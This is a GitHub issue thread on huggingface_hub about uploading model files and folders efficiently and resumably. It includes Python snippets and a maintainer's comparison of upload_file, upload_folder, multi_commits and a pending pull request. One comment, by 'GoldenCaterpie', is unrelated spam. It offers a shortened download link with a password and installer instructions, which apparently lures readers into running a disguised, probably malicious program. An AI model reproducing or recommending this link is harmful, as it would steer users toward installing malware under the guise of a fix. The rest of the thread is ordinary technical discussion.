### ISSUE TITLE
How to uplaod folders into repo with most effective way - on error continue resume max speed

### ISSUE THREAD

**Issue by FurkanGozukara** [huggingface/huggingface_hub#2491]
Hello. I have the below tasks for uploading however I am not sure if they are most effective way of doing

#### This cell is used to upload single file into a repo with certain name

```

from huggingface_hub import HfApi
api = HfApi()
api.upload_file(
    path_or_fileobj=r"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion/model_name.safetensors",
    path_in_repo="model_name.safetensors",
    repo_id="YourUserName/reponame",
    repo_type="model",
)
```

#### This cell is used to upload a folder into a repo with single commit

```
from huggingface_hub import HfApi
api = HfApi()
api.upload_folder(
    folder_path=r"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion",
    repo_id="YourUserName/reponame",
    repo_type="model",
)
```

This one is especially super slow whenever I run. I think it re-calculates sha to compare if files modified

#### Supports continue feature so if gets interrupted you can run again to continue / resume
```

from huggingface_hub import HfApi
from huggingface_hub import get_collection, delete_collection_item
from huggingface_hub import upload_file
from huggingface_hub import (
    HfFolder,
    ModelCard,
    ModelCardData,
    create_repo,
    hf_hub_download,
    upload_folder,
    whoami,
)
api = HfApi()
upload_folder(
    folder_path=r"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion",
    repo_id="YourUserName/reponame",
    repo_type="model",
    multi_commits=True,
    multi_commits_verbose=True,
)



```

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Wauplin** [comment]
Hi @FurkanGozukara :
- `upload_file` is the most effective way if you have a single file
- `upload_folder` is a convenient one if you have a folder. However, it won't work on huge folder (timeout on commit) + it has to recompute the files hash all the time
- `multi_commit` => experimental and not really recommended
- `create_commit` => if you know what you're doing
- work in https://github.com/huggingface/huggingface_hub/pull/2254 => most effective one for resumable process + robust

Hope this help you decide what's best for you. We usually recommend `upload_file` and `uplaod_folder` for simple cases.

**Comment by FurkanGozukara** [comment]
@Wauplin thank you. when for some reason upload_folder fails it starts from 0 again right? multi_commit is able to continue

**Comment by Wauplin** [comment]
Correct yes, upload_folder doesn't have a sense of caching. This is what we try to achieve with the PR mentioned above (that you can already use! instructions are in PR description)

**Comment by FurkanGozukara** [comment]
> Correct yes, upload_folder doesn't have a sense of caching. This is what we try to achieve with the PR mentioned above (that you can already use! instructions are in PR description)

Awesome going to test that pr and let you know next time

**Comment by Wauplin** [comment]
Great, in the meantime I'll close this issue since there isn't really an issue, right?
